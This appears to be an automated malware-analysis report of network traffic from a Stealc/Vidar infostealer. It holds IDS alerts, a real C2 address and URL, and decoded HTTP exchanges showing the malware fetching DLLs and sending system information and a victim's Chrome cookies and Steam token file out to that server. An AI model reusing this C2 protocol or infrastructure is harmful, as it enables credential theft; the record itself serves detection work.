Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 34 46 41 45 46 32 34 42 44 33 42 33 30 32 33 30 31 31 38 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"04FAEF24BD3B3023011859------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"save------JKKFIIEBKEGIEBFIJKFI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="message"browsers------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEBHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 2d 2d 0d 0a Data Ascii: ------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="message"plugins------AAEHIDAKECFIEBGDHJEB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 2d 2d 0d 0a Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="message"fplugins------CGHDAKKJJJKJKECBGCGD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCHost: 185.215.113.37Content-Length: 6627Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGIHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 2d 2d 0d 0a Data Ascii: ------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 2d 2d 0d 0a Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="file"------KEBGHCBAEGDHIDGCBAEC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 2d 2d 0d 0a Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file"------AKECBFBAEBKJJJJKFCGC--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCBHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"wallets------JKECFCFBGDHIECAAFIID--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="message"ybncbhylepme------FBFHDBKJEGHJJJKFIIJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIEBGCBGIDHDGCAKJEBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 2d 2d 0d 0a Data Ascii: ------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="file"------IIIEBGCBGIDHDGCAKJEB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="message"files------DHCAECGIEBKJKEBGDHDA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HJEHIJEBKEBFBFHIIDHI--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
